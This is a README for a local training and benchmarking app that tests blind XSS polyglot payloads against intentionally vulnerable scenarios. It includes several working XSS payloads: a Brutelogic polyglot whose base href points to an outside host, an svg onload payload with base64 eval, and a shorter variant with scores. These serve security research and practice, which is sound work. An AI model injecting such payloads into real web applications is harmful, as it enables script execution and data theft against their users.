bXSS Benchmark is a web application designed to evaluate and benchmark the effectiveness of blind XSS (Cross-Site Scripting) polyglot payloads against a variety of real-world scenarios. It provides a structured environment for security researchers and developers to test, compare, and analyze payloads in different contexts, helping to improve web application security. It also can be use to train your XSS skills.
As the XSS gym training developed by brutelogic is no longer accessible, this project is a local alternative. I try to integrated his previous scenario as reference, but this integration isn't fully finnished.
It is a side project, do not hesitate to report issues. I will try to fix them as soon as possible !
PS: I would not recommend to expose this app pubicly, no security measures have been deployed and the app is still under development.
- Scenario-Based Testing: Test payloads against a curated set of XSS scenarios.
- Payload Management: Add, edit, and manage XSS payloads.
- Automated and Headless Testing: Run tests automatically in headless mode.
- Result Tracking: View and analyze the effectiveness of payloads.
- Extensible: Easily add new scenarios via YAML files.
- Training: Practice your xss skills in different contexts.
- Docker (optional, for containerized setup)
git clone https://github.com/your-org/xss-benchmark.git
cd xss-benchmarkdocker compose up --build
sudo echo 'xsslab_app 127.0.0.1' >> /etc/hostsThe application will be available at http://xsslab_app:9090.
go to webapp, in the home page add your payload and run a benchmark.
Payloads examples:
Brutelogic bxss
JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
Basic bxss
"><svg/onload=eval(atob('YWxlcnQoImJ4c3MiKQ=='))>// You want to improve your payload and modify it manually?
- Go to the Scenarios page
- Click on the scenario you want to test.
- In the url add "?payload=" followed by your payload
- Press enter :)
-
Edit the Scenario YAML File
Add your new scenario to the main YAML file, e.g.
app/scenarios/TBD/scenarios.yaml, following the existing format. -
Extract Scenario Files
Use the provided script to split scenarios into individual YAML files:
bash scripts/extract_scenarios.sh
This will generate scenario files in
app/scenarios/definitions/. -
Verify Scenario Loading
The application loads scenarios from the definitions directory at startup or when you click on the button in the scenario web page.
-
Test Your Scenario
- Visit
/scenariosin the web UI to see your new scenario. - Test with different payloads, using the 'payload=' url parameter
- Visit
app/
controllers/
models/
scenarios/
definitions/ // scenario defintions are there
TBD/
templates/
static/
app.py
scripts/
extract_scenarios.sh
tests/
README.md
requirements.txt
- Fork the repository and create a feature branch.
- Submit pull requests with clear descriptions.
- Follow PEP8 and project-specific code style.
For questions or support, please open an issue or contact the maintainer.
From Brutelogic - 105/110
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->Shortest alternative - 105/115
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eFor js_snippet insert the payload in a custom js file. Because there is redundancy for brutelogic xss gym. Brutelogic filter is probably operate via backslashing quotes. add scenario : script src in head section